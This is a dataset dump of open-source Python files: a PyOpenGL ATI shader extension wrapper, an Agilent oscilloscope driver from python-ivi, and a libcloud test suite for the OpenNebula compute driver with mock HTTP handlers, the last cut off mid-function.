repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool)
---|---|---|---|---|---|---|---|---|---|---|
D4wN/brickv | src/build_data/windows/OpenGL/GL/ATI/text_fragment_shader.py | 4 | 3610 | '''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specified using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object management portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the APIs of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.ATI.text_fragment_shader import *
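# Typical usage sketch (the extension-query helper below follows standard
# PyOpenGL conventions and is not defined in this module; treat it as an
# assumption rather than part of this wrapper):
#
#     if extensions.hasGLExtension('GL_ATI_text_fragment_shader'):
#         ...  # safe to call the ATI text fragment shader entry points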
### END AUTOGENERATED SECTION | gpl-2.0 | 142,122,769,263,808,050 | 46.513158 | 69 | 0.789474 | false |
Diti24/python-ivi | ivi/agilent/agilentDSA90804A.py | 1 | 1686 | """
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentDSA90804A(agilent90000):
"Agilent Infiniium DSA90804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'DSO90804A')
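# setdefault keeps any _instrument_id a subclass may already have assigned
# before delegating to this initializer; 'DSO90804A' is only the fallback.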
super(agilentDSA90804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 0
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 8e9
self._init_channels()
| mit | -3,106,518,787,911,555,000 | 37.318182 | 86 | 0.736655 | false |
mtekel/libcloud | libcloud/test/compute/test_opennebula.py | 46 | 46927 | # Copyright 2002-2009, Distributed Systems Architecture Group, Universidad
# Complutense de Madrid (dsa-research.org)
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
OpenNebula.org test suite.
"""
__docformat__ = 'epytext'
import unittest
import sys
from libcloud.utils.py3 import httplib
from libcloud.compute.base import Node, NodeImage, NodeSize, NodeState
from libcloud.compute.drivers.opennebula import OpenNebulaNodeDriver
from libcloud.compute.drivers.opennebula import OpenNebulaNetwork
from libcloud.compute.drivers.opennebula import OpenNebulaResponse
from libcloud.compute.drivers.opennebula import OpenNebulaNodeSize
from libcloud.compute.drivers.opennebula import ACTION
from libcloud.test.file_fixtures import ComputeFileFixtures
from libcloud.common.types import InvalidCredsError
from libcloud.test import MockResponse, MockHttp
from libcloud.test.compute import TestCaseMixin
from libcloud.test.secrets import OPENNEBULA_PARAMS
class OpenNebulaCaseMixin(TestCaseMixin):
def test_reboot_node_response(self):
pass
class OpenNebula_ResponseTests(unittest.TestCase):
XML = """<?xml version="1.0" encoding="UTF-8"?><root/>"""
def test_unauthorized_response(self):
http_response = MockResponse(httplib.UNAUTHORIZED,
OpenNebula_ResponseTests.XML,
headers={'content-type':
'application/xml'})
try:
OpenNebulaResponse(http_response, None).parse_body()
except InvalidCredsError:
exceptionType = sys.exc_info()[0]
self.assertEqual(exceptionType, type(InvalidCredsError()))
class OpenNebula_1_4_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v1.4.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_1_4_MockHttp, OpenNebula_1_4_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('1.4',))
def test_create_node(self):
"""
Test create_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
size = NodeSize(id=1, name='small', ram=None, disk=None,
bandwidth=None, price=None, driver=self.driver)
networks = list()
networks.append(OpenNebulaNetwork(id=5, name='Network 5',
address='192.168.0.0', size=256, driver=self.driver))
networks.append(OpenNebulaNetwork(id=15, name='Network 15',
address='192.168.1.0', size=256, driver=self.driver))
node = self.driver.create_node(name='Compute 5', image=image,
size=size, networks=networks)
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.extra['dev'], 'sda1')
def test_destroy_node(self):
"""
Test destroy_node functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_nodes(self):
"""
Test list_nodes functionality.
"""
nodes = self.driver.list_nodes()
self.assertEqual(len(nodes), 3)
node = nodes[0]
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.extra['dev'], 'sda1')
node = nodes[1]
self.assertEqual(node.id, '15')
self.assertEqual(node.name, 'Compute 15')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.2')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.2')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image.id, '15')
self.assertEqual(node.image.extra['dev'], 'sda1')
node = nodes[2]
self.assertEqual(node.id, '25')
self.assertEqual(node.name, 'Compute 25')
self.assertEqual(node.state,
NodeState.UNKNOWN)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, None)
self.assertEqual(node.public_ips[0].address, '192.168.0.3')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, None)
self.assertEqual(node.public_ips[1].address, '192.168.1.3')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.private_ips, [])
self.assertEqual(node.image, None)
def test_list_images(self):
"""
Test list_images functionality.
"""
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
self.assertEqual(image.id, '5')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['size'], '2048')
self.assertEqual(image.extra['url'],
'file:///images/ubuntu/jaunty.img')
image = images[1]
self.assertEqual(image.id, '15')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['size'], '2048')
self.assertEqual(image.extra['url'],
'file:///images/ubuntu/jaunty.img')
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
def test_list_locations(self):
"""
Test list_locations functionality.
"""
locations = self.driver.list_locations()
self.assertEqual(len(locations), 1)
location = locations[0]
self.assertEqual(location.id, '0')
self.assertEqual(location.name, '')
self.assertEqual(location.country, '')
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
def test_ex_node_action(self):
"""
Test ex_node_action functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.ex_node_action(node, ACTION.STOP)
self.assertTrue(ret)
class OpenNebula_2_0_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v2.0 through v2.2.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_2_0_MockHttp, OpenNebula_2_0_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('2.0',))
def test_create_node(self):
"""
Test create_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
size = OpenNebulaNodeSize(id=1, name='small', ram=1024, cpu=1,
disk=None, bandwidth=None, price=None,
driver=self.driver)
networks = list()
networks.append(OpenNebulaNetwork(id=5, name='Network 5',
address='192.168.0.0', size=256, driver=self.driver))
networks.append(OpenNebulaNetwork(id=15, name='Network 15',
address='192.168.1.0', size=256, driver=self.driver))
context = {'hostname': 'compute-5'}
node = self.driver.create_node(name='Compute 5', image=image,
size=size, networks=networks,
context=context)
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([s for s in self.driver.list_sizes()
if s.id == node.size.id]) == 1)
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-5')
def test_destroy_node(self):
"""
Test destroy_node functionality.
"""
node = Node(5, None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_nodes(self):
"""
Test list_nodes functionality.
"""
nodes = self.driver.list_nodes()
self.assertEqual(len(nodes), 3)
node = nodes[0]
self.assertEqual(node.id, '5')
self.assertEqual(node.name, 'Compute 5')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.1')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.1')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([size for size in self.driver.list_sizes()
if size.id == node.size.id]) == 1)
self.assertEqual(node.size.id, '1')
self.assertEqual(node.size.name, 'small')
self.assertEqual(node.size.ram, 1024)
self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu,
int))
self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu,
int))
self.assertEqual(node.size.cpu, 1)
self.assertEqual(node.size.vcpu, None)
self.assertEqual(node.size.disk, None)
self.assertEqual(node.size.bandwidth, None)
self.assertEqual(node.size.price, None)
self.assertTrue(len([image for image in self.driver.list_images()
if image.id == node.image.id]) == 1)
self.assertEqual(node.image.id, '5')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-5')
node = nodes[1]
self.assertEqual(node.id, '15')
self.assertEqual(node.name, 'Compute 15')
self.assertEqual(node.state,
OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE'])
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.2')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:02')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.2')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:02')
self.assertEqual(node.private_ips, [])
self.assertTrue(len([size for size in self.driver.list_sizes()
if size.id == node.size.id]) == 1)
self.assertEqual(node.size.id, '1')
self.assertEqual(node.size.name, 'small')
self.assertEqual(node.size.ram, 1024)
self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu,
int))
self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu,
int))
self.assertEqual(node.size.cpu, 1)
self.assertEqual(node.size.vcpu, None)
self.assertEqual(node.size.disk, None)
self.assertEqual(node.size.bandwidth, None)
self.assertEqual(node.size.price, None)
self.assertTrue(len([image for image in self.driver.list_images()
if image.id == node.image.id]) == 1)
self.assertEqual(node.image.id, '15')
self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(node.image.extra['type'], 'DISK')
self.assertEqual(node.image.extra['target'], 'hda')
context = node.extra['context']
self.assertEqual(context['hostname'], 'compute-15')
node = nodes[2]
self.assertEqual(node.id, '25')
self.assertEqual(node.name, 'Compute 25')
self.assertEqual(node.state,
NodeState.UNKNOWN)
self.assertEqual(node.public_ips[0].id, '5')
self.assertEqual(node.public_ips[0].name, 'Network 5')
self.assertEqual(node.public_ips[0].address, '192.168.0.3')
self.assertEqual(node.public_ips[0].size, 1)
self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:03')
self.assertEqual(node.public_ips[1].id, '15')
self.assertEqual(node.public_ips[1].name, 'Network 15')
self.assertEqual(node.public_ips[1].address, '192.168.1.3')
self.assertEqual(node.public_ips[1].size, 1)
self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:03')
self.assertEqual(node.private_ips, [])
self.assertEqual(node.size, None)
self.assertEqual(node.image, None)
context = node.extra['context']
self.assertEqual(context, {})
def test_list_images(self):
"""
Test list_images functionality.
"""
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
self.assertEqual(image.id, '5')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['description'],
'Ubuntu 9.04 LAMP Description')
self.assertEqual(image.extra['type'], 'OS')
self.assertEqual(image.extra['size'], '2048')
image = images[1]
self.assertEqual(image.id, '15')
self.assertEqual(image.name, 'Ubuntu 9.04 LAMP')
self.assertEqual(image.extra['description'],
'Ubuntu 9.04 LAMP Description')
self.assertEqual(image.extra['type'], 'OS')
self.assertEqual(image.extra['size'], '2048')
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 4)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertTrue(size.cpu is None or isinstance(size.cpu, int))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[3]
self.assertEqual(size.id, '4')
self.assertEqual(size.name, 'custom')
self.assertEqual(size.ram, 0)
self.assertEqual(size.cpu, 0)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
def test_list_locations(self):
"""
Test list_locations functionality.
"""
locations = self.driver.list_locations()
self.assertEqual(len(locations), 1)
location = locations[0]
self.assertEqual(location.id, '0')
self.assertEqual(location.name, '')
self.assertEqual(location.country, '')
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
class OpenNebula_3_0_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.0.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_0_MockHttp, OpenNebula_3_0_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.0',))
def test_ex_list_networks(self):
"""
Test ex_list_networks functionality.
"""
networks = self.driver.ex_list_networks()
self.assertEqual(len(networks), 2)
network = networks[0]
self.assertEqual(network.id, '5')
self.assertEqual(network.name, 'Network 5')
self.assertEqual(network.address, '192.168.0.0')
self.assertEqual(network.size, '256')
self.assertEqual(network.extra['public'], 'YES')
network = networks[1]
self.assertEqual(network.id, '15')
self.assertEqual(network.name, 'Network 15')
self.assertEqual(network.address, '192.168.1.0')
self.assertEqual(network.size, '256')
self.assertEqual(network.extra['public'], 'NO')
def test_ex_node_set_save_name(self):
"""
Test ex_node_set_save_name functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
node = Node(5, None, None, None, None, self.driver, image=image)
ret = self.driver.ex_node_set_save_name(node, 'test')
self.assertTrue(ret)
class OpenNebula_3_2_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.2.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_2_MockHttp, OpenNebula_3_2_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.2',))
def test_reboot_node(self):
"""
Test reboot_node functionality.
"""
image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver)
node = Node(5, None, None, None, None, self.driver, image=image)
ret = self.driver.reboot_node(node)
self.assertTrue(ret)
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertTrue(size.cpu is None or isinstance(size.cpu, float))
self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int))
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
class OpenNebula_3_6_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.6.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_6_MockHttp, OpenNebula_3_6_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.6',))
def test_create_volume(self):
new_volume = self.driver.create_volume(1000, 'test-volume')
self.assertEqual(new_volume.id, '5')
self.assertEqual(new_volume.size, 1000)
self.assertEqual(new_volume.name, 'test-volume')
def test_destroy_volume(self):
images = self.driver.list_images()
self.assertEqual(len(images), 2)
image = images[0]
ret = self.driver.destroy_volume(image)
self.assertTrue(ret)
def test_attach_volume(self):
nodes = self.driver.list_nodes()
node = nodes[0]
images = self.driver.list_images()
image = images[0]
ret = self.driver.attach_volume(node, image, 'sda')
self.assertTrue(ret)
def test_detach_volume(self):
images = self.driver.list_images()
image = images[1]
ret = self.driver.detach_volume(image)
self.assertTrue(ret)
nodes = self.driver.list_nodes()
# node with only a single associated image
node = nodes[1]
ret = self.driver.detach_volume(node.image)
self.assertFalse(ret)
def test_list_volumes(self):
volumes = self.driver.list_volumes()
self.assertEqual(len(volumes), 2)
volume = volumes[0]
self.assertEqual(volume.id, '5')
self.assertEqual(volume.size, 2048)
self.assertEqual(volume.name, 'Ubuntu 9.04 LAMP')
volume = volumes[1]
self.assertEqual(volume.id, '15')
self.assertEqual(volume.size, 1024)
self.assertEqual(volume.name, 'Debian Sid')
class OpenNebula_3_8_Tests(unittest.TestCase, OpenNebulaCaseMixin):
"""
OpenNebula.org test suite for OpenNebula v3.8.
"""
def setUp(self):
"""
Setup test environment.
"""
OpenNebulaNodeDriver.connectionCls.conn_classes = (
OpenNebula_3_8_MockHttp, OpenNebula_3_8_MockHttp)
self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.8',))
def test_list_sizes(self):
"""
Test list_sizes functionality.
"""
sizes = self.driver.list_sizes()
self.assertEqual(len(sizes), 3)
size = sizes[0]
self.assertEqual(size.id, '1')
self.assertEqual(size.name, 'small')
self.assertEqual(size.ram, 1024)
self.assertEqual(size.cpu, 1)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[1]
self.assertEqual(size.id, '2')
self.assertEqual(size.name, 'medium')
self.assertEqual(size.ram, 4096)
self.assertEqual(size.cpu, 4)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
size = sizes[2]
self.assertEqual(size.id, '3')
self.assertEqual(size.name, 'large')
self.assertEqual(size.ram, 8192)
self.assertEqual(size.cpu, 8)
self.assertEqual(size.vcpu, None)
self.assertEqual(size.disk, None)
self.assertEqual(size.bandwidth, None)
self.assertEqual(size.price, None)
class OpenNebula_1_4_MockHttp(MockHttp):
"""
Mock HTTP server for testing v1.4 of the OpenNebula.org compute driver.
"""
fixtures = ComputeFileFixtures('opennebula_1_4')
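# MockHttp routes each request by its URL path: a GET on /compute/5 is
# dispatched to the method named _compute_5 (slashes become underscores),
# which is why the handlers below mirror the driver's resource paths.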
def _compute(self, method, url, body, headers):
"""
Compute pool resources.
"""
if method == 'GET':
body = self.fixtures.load('computes.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('compute_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _storage(self, method, url, body, headers):
"""
Storage pool resources.
"""
if method == 'GET':
body = self.fixtures.load('storage.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('disk_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures.load('networks.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
